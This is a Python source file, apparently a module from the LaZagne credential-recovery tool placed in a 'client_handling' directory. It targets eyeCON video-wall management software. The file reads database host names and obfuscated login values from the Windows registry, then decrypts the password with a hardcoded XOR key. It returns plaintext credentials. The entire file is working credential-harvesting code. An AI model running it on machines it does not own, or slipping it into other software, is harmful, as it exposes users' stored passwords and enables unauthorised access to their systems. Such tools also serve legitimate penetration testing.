1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
|
# -*- coding: utf-8 -*-
import codecs
try:
import _winreg as winreg
except ImportError:
import winreg
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import *
class EyeCON(ModuleInfo):
"""
eyeCON software WAll management software
infos at http://www.eyevis.de/en/products/wall-management-software.html
"""
def __init__(self):
self.hex_key = [ 35, 231, 64, 111, 100, 72, 95, 65, 68, 51, 52, 70, 67, 51, 65, 95, 54, 55, 50, 48, 95, 49, 49,
68, 54, 95, 65, 48, 53, 50, 95, 48, 48, 48, 52, 55, 54, 65, 48, 70, 66, 53, 66, 65, 70, 88, 95, 76, 79, 71,
73, 49, 76, 115, 107, 100, 85, 108, 107, 106, 102, 100, 109, 32, 50, 102, 115, 100, 102, 102, 32, 102, 119,
115, 38, 78, 68, 76, 76, 95, 72, 95, 95, 0 ]
ModuleInfo.__init__(self, name='EyeCon', category='multimedia')
def deobfuscate(self, ciphered_str):
return b''.join([chr_or_byte(char_to_int(c) ^ k) for c, k in zip(codecs.decode(ciphered_str, 'hex'), self.hex_key)])
def get_db_hosts(self):
hosts = []
paths = (
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB1'),
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB2'),
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB3'),
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB1'),
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB2'),
('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB3'),
)
for path in paths:
try:
hkey = OpenKey(path[1], path[2])
reg_key = winreg.QueryValueEx(hkey, path[3])[0]
if reg_key:
hosts += [reg_key]
except Exception:
# skipping if value doesn't exist
# self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path[1]+path[2]))
pass
return hosts
def credentials_from_registry(self):
found_passwords = []
password_path = (
{
'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
'reg_path': 'SOFTWARE\\WOW6432Node\\eyevis\\eyetool\\Default',
'user_key': 'registered', 'password_key': 'connection'
},
{
'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
'reg_path': 'SOFTWARE\\eyevis\\eyetool\\Default',
'user_key': 'registered', 'password_key': 'connection'
},
)
for path in password_path:
values = {}
try:
try:
hkey = OpenKey(path['reg_root'], path['reg_path'])
reg_user_key = winreg.QueryValueEx(hkey, path['user_key'])[0]
reg_password_key = winreg.QueryValueEx(hkey, path['password_key'])[0]
except Exception:
self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path['reg_root'] + path['reg_path']))
continue
try:
user = self.deobfuscate(reg_user_key)
except Exception:
self.info(u'Problems with deobfuscate user : {reg_key}'.format(reg_key=path['reg_path']))
continue
try:
password = self.deobfuscate(reg_password_key)
except Exception:
self.info(u'Problems with deobfuscate password : {reg_key}'.format(reg_key=path['reg_path']))
continue
found_passwords.append({'username': user, 'password': password})
except Exception:
pass
return found_passwords
def run(self):
hosts = self.get_db_hosts()
credentials = self.credentials_from_registry()
for cred in credentials:
cred['host(s)'] = b', '.join(hosts)
return credentials
|
